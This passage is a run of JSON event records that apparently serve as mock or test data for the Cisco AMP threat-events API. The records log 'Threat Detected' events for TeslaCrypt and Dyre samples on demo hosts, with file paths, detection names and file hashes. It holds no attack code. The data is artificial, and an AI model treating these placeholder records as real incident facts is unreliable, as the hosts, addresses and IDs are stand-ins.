Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
